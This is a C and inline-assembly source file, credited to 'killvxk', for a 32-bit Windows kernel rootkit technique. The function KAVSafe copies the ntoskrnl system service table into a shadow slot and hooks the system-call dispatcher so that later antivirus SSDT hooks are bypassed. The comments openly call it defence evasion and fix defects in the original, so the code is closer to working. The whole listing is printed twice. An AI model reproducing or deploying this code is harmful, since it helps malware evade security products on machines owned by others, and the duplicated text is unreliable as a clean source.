//By killvxk
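/*
 * KAVSafe - register a private ("shadow") copy of the ntoskrnl system
 * service table as service table slot 3 and hook the dispatcher so that
 * service numbers aimed at table 0 are re-routed to the copy.
 *
 * Security relevance: this is a kernel-mode defence-evasion technique.
 * Any SSDT hooks that a security product installs into
 * KeServiceDescriptorTable->ntoskrnl.ServiceTable *after* this runs are
 * bypassed for the re-routed calls, because the dispatcher now reads the
 * private copy.  Note that the copy is a plain memcpy snapshot of whatever
 * ServiceTable holds at call time - hooks already present are copied too.
 * The function name suggests a specific AV product is the target; the code
 * itself is product-agnostic.
 *
 * Inputs : none (reads KeServiceDescriptorTable).
 * Outputs: globals LimitNumber, mySST, mySSTParamTable and - on success -
 *          oldret (the continuation address returned by HookCode).
 * Side effects: two NonPagedPool allocations tagged VXK_POOL_TAG, a new
 *          system service table in slot VXK_SHADOW_SST_INDEX, and the code
 *          hook whose body is hkKiXXXX.
 *
 * Defects in the original fixed here: allocation results were never checked
 * (a NULL from ExAllocatePoolWithTag would have been handed to memcpy), both
 * buffers leaked when KeAddSystemServiceTable refused the table, the goto
 * lacked its semicolon and its label was not a valid identifier.  The
 * fallback for systems where slot 3 is missing or already occupied remains
 * unimplemented, exactly as in the original.
 *
 * 32-bit only: table entries are copied as 4-byte ULONGs and the companion
 * hook hkKiXXXX uses pushad/popad.
 */
#ifndef VXK_SHADOW_SST_INDEX
#define VXK_SHADOW_SST_INDEX 3      /* service table slot that receives the copy */
#endif
#ifndef VXK_POOL_TAG
#define VXK_POOL_TAG 'vxk'          /* 3-char tag, kept as in the original (tags are conventionally 4 chars) */
#endif
#ifndef VXK_SST_SLACK
#define VXK_SST_SLACK 20            /* extra bytes per buffer; purpose not explained in the original */
#endif

void KAVSafe()
{
    LimitNumber = KeServiceDescriptorTable->ntoskrnl.ServiceLimit;

    mySST = (PULONG)ExAllocatePoolWithTag(NonPagedPool,
                                          LimitNumber * sizeof(ULONG) + VXK_SST_SLACK,
                                          VXK_POOL_TAG);
    if (mySST == NULL)
    {
        return;                     /* nothing to undo yet */
    }

    mySSTParamTable = (PUCHAR)ExAllocatePoolWithTag(NonPagedPool,
                                                    LimitNumber + VXK_SST_SLACK,
                                                    VXK_POOL_TAG);
    if (mySSTParamTable == NULL)
    {
        ExFreePoolWithTag(mySST, VXK_POOL_TAG);
        mySST = NULL;
        return;
    }

    /* Snapshot the live dispatch table and the per-service argument-size
     * table.  Whatever is in them right now - including foreign hooks -
     * becomes the content of the shadow table. */
    memcpy(mySST, KeServiceDescriptorTable->ntoskrnl.ServiceTable, LimitNumber * sizeof(ULONG));
    memcpy(mySSTParamTable, KeServiceDescriptorTable->ntoskrnl.ArgumentTable, LimitNumber);

    /* Second argument NULL: no per-call counter table is supplied. */
    if (!KeAddSystemServiceTable(mySST, NULL, LimitNumber, mySSTParamTable, VXK_SHADOW_SST_INDEX))
    {
        /* Some systems do not have four table slots, or slot 3 is already
         * taken.  The original intended to copy the first table and append
         * itself behind it here, but that code was omitted ("for xxxx
         * reasons").  Release the buffers rather than leaking them. */
        ExFreePoolWithTag(mySSTParamTable, VXK_POOL_TAG);
        ExFreePoolWithTag(mySST, VXK_POOL_TAG);
        mySSTParamTable = NULL;
        mySST = NULL;
        return;
    }

    /* Table registered: divert the dispatcher.  hkKiXXXX biases table-0
     * service numbers by 0x3000 (slot 3 << 12) so they index the copy. */
    oldret = HookCode(hkKiXXXX);
}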
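/*
 * hkKiXXXX - detour body that KAVSafe installs with HookCode() into the
 * (32-bit) system-call dispatch path.
 *
 * Assumption (TODO confirm against the instruction HookCode patches): on
 * entry eax holds the system service number about to be dispatched.
 * Numbers below 0x1000 belong to service table 0 (ntoskrnl); the detour
 * adds 0x3000 to them so the dispatcher indexes table 3 - the private copy
 * registered by KAVSafe - instead.  Numbers >= 0x1000 pass through
 * unchanged.  Control then continues at the address held in the global
 * `oldret` (an indirect jump through that variable).
 *
 * General registers, flags and the fs/es/ds selectors are saved and
 * restored around the check, so the only state that differs at oldret is
 * eax (+0x3000 on the re-route path) and, on that path, the flags written
 * by the final `add` after popfd.  Whether the continuation at oldret
 * depends on flags cannot be judged from this listing.
 *
 * NOTE(review): fs is loaded with 0x30 and then restored from the stack
 * before anything reads it, so the load has no lasting effect in this body.
 * It looks like a remnant of a larger routine; it is kept as-is.
 *
 * Original defect fixed: the definition lacked its parameter list
 * (`void hkKiXXXX` is not a valid function definition).
 */
#ifndef VXK_SHADOW_SST_BIAS
#define VXK_SHADOW_SST_BIAS 0x3000     /* = service table index 3 << 12; must match KeAddSystemServiceTable's index */
#endif
#ifndef VXK_TABLE0_LIMIT
#define VXK_TABLE0_LIMIT 0x1000        /* first service number that is not table 0 */
#endif
#ifndef VXK_R0_PCR_SELECTOR
#define VXK_R0_PCR_SELECTOR 0x30       /* presumably the ring-0 PCR selector - confirm for the target build */
#endif

__declspec(naked)
void hkKiXXXX(void)
{
    __asm
    {
        pushad
        pushfd
        push    fs
        push    es
        push    ds

        push    eax                         ; keep full eax across the 16-bit ax write
        mov     ax, VXK_R0_PCR_SELECTOR
        mov     fs, ax                      ; restored by `pop fs` below before any use
        pop     eax

        cmp     eax, VXK_TABLE0_LIMIT       ; unsigned: does the number target table 0?
        jb      fixit

    nofix:
        pop     ds
        pop     es
        pop     fs
        popfd
        popad
        jmp     oldret                      ; resume original dispatcher, eax untouched

    fixit:
        pop     ds
        pop     es
        pop     fs
        popfd
        popad
        add     eax, VXK_SHADOW_SST_BIAS    ; re-route to shadow table 3 (clobbers flags after popfd)
        jmp     oldret
    }
}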
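/*
 * KAVSafe - register a private ("shadow") copy of the ntoskrnl system
 * service table as service table slot 3 and hook the dispatcher so that
 * service numbers aimed at table 0 are re-routed to the copy.
 *
 * Security relevance: this is a kernel-mode defence-evasion technique.
 * Any SSDT hooks that a security product installs into
 * KeServiceDescriptorTable->ntoskrnl.ServiceTable *after* this runs are
 * bypassed for the re-routed calls, because the dispatcher now reads the
 * private copy.  Note that the copy is a plain memcpy snapshot of whatever
 * ServiceTable holds at call time - hooks already present are copied too.
 * The function name suggests a specific AV product is the target; the code
 * itself is product-agnostic.
 *
 * Inputs : none (reads KeServiceDescriptorTable).
 * Outputs: globals LimitNumber, mySST, mySSTParamTable and - on success -
 *          oldret (the continuation address returned by HookCode).
 * Side effects: two NonPagedPool allocations tagged VXK_POOL_TAG, a new
 *          system service table in slot VXK_SHADOW_SST_INDEX, and the code
 *          hook whose body is hkKiXXXX.
 *
 * Defects in the original fixed here: allocation results were never checked
 * (a NULL from ExAllocatePoolWithTag would have been handed to memcpy), both
 * buffers leaked when KeAddSystemServiceTable refused the table, the goto
 * lacked its semicolon and its label was not a valid identifier.  The
 * fallback for systems where slot 3 is missing or already occupied remains
 * unimplemented, exactly as in the original.
 *
 * 32-bit only: table entries are copied as 4-byte ULONGs and the companion
 * hook hkKiXXXX uses pushad/popad.
 */
#ifndef VXK_SHADOW_SST_INDEX
#define VXK_SHADOW_SST_INDEX 3      /* service table slot that receives the copy */
#endif
#ifndef VXK_POOL_TAG
#define VXK_POOL_TAG 'vxk'          /* 3-char tag, kept as in the original (tags are conventionally 4 chars) */
#endif
#ifndef VXK_SST_SLACK
#define VXK_SST_SLACK 20            /* extra bytes per buffer; purpose not explained in the original */
#endif

void KAVSafe()
{
    LimitNumber = KeServiceDescriptorTable->ntoskrnl.ServiceLimit;

    mySST = (PULONG)ExAllocatePoolWithTag(NonPagedPool,
                                          LimitNumber * sizeof(ULONG) + VXK_SST_SLACK,
                                          VXK_POOL_TAG);
    if (mySST == NULL)
    {
        return;                     /* nothing to undo yet */
    }

    mySSTParamTable = (PUCHAR)ExAllocatePoolWithTag(NonPagedPool,
                                                    LimitNumber + VXK_SST_SLACK,
                                                    VXK_POOL_TAG);
    if (mySSTParamTable == NULL)
    {
        ExFreePoolWithTag(mySST, VXK_POOL_TAG);
        mySST = NULL;
        return;
    }

    /* Snapshot the live dispatch table and the per-service argument-size
     * table.  Whatever is in them right now - including foreign hooks -
     * becomes the content of the shadow table. */
    memcpy(mySST, KeServiceDescriptorTable->ntoskrnl.ServiceTable, LimitNumber * sizeof(ULONG));
    memcpy(mySSTParamTable, KeServiceDescriptorTable->ntoskrnl.ArgumentTable, LimitNumber);

    /* Second argument NULL: no per-call counter table is supplied. */
    if (!KeAddSystemServiceTable(mySST, NULL, LimitNumber, mySSTParamTable, VXK_SHADOW_SST_INDEX))
    {
        /* Some systems do not have four table slots, or slot 3 is already
         * taken.  The original intended to copy the first table and append
         * itself behind it here, but that code was omitted ("for xxxx
         * reasons").  Release the buffers rather than leaking them. */
        ExFreePoolWithTag(mySSTParamTable, VXK_POOL_TAG);
        ExFreePoolWithTag(mySST, VXK_POOL_TAG);
        mySSTParamTable = NULL;
        mySST = NULL;
        return;
    }

    /* Table registered: divert the dispatcher.  hkKiXXXX biases table-0
     * service numbers by 0x3000 (slot 3 << 12) so they index the copy. */
    oldret = HookCode(hkKiXXXX);
}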
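/*
 * hkKiXXXX - detour body that KAVSafe installs with HookCode() into the
 * (32-bit) system-call dispatch path.
 *
 * Assumption (TODO confirm against the instruction HookCode patches): on
 * entry eax holds the system service number about to be dispatched.
 * Numbers below 0x1000 belong to service table 0 (ntoskrnl); the detour
 * adds 0x3000 to them so the dispatcher indexes table 3 - the private copy
 * registered by KAVSafe - instead.  Numbers >= 0x1000 pass through
 * unchanged.  Control then continues at the address held in the global
 * `oldret` (an indirect jump through that variable).
 *
 * General registers, flags and the fs/es/ds selectors are saved and
 * restored around the check, so the only state that differs at oldret is
 * eax (+0x3000 on the re-route path) and, on that path, the flags written
 * by the final `add` after popfd.  Whether the continuation at oldret
 * depends on flags cannot be judged from this listing.
 *
 * NOTE(review): fs is loaded with 0x30 and then restored from the stack
 * before anything reads it, so the load has no lasting effect in this body.
 * It looks like a remnant of a larger routine; it is kept as-is.
 *
 * Original defect fixed: the definition lacked its parameter list
 * (`void hkKiXXXX` is not a valid function definition).
 */
#ifndef VXK_SHADOW_SST_BIAS
#define VXK_SHADOW_SST_BIAS 0x3000     /* = service table index 3 << 12; must match KeAddSystemServiceTable's index */
#endif
#ifndef VXK_TABLE0_LIMIT
#define VXK_TABLE0_LIMIT 0x1000        /* first service number that is not table 0 */
#endif
#ifndef VXK_R0_PCR_SELECTOR
#define VXK_R0_PCR_SELECTOR 0x30       /* presumably the ring-0 PCR selector - confirm for the target build */
#endif

__declspec(naked)
void hkKiXXXX(void)
{
    __asm
    {
        pushad
        pushfd
        push    fs
        push    es
        push    ds

        push    eax                         ; keep full eax across the 16-bit ax write
        mov     ax, VXK_R0_PCR_SELECTOR
        mov     fs, ax                      ; restored by `pop fs` below before any use
        pop     eax

        cmp     eax, VXK_TABLE0_LIMIT       ; unsigned: does the number target table 0?
        jb      fixit

    nofix:
        pop     ds
        pop     es
        pop     fs
        popfd
        popad
        jmp     oldret                      ; resume original dispatcher, eax untouched

    fixit:
        pop     ds
        pop     es
        pop     fs
        popfd
        popad
        add     eax, VXK_SHADOW_SST_BIAS    ; re-route to shadow table 3 (clobbers flags after popfd)
        jmp     oldret
    }
}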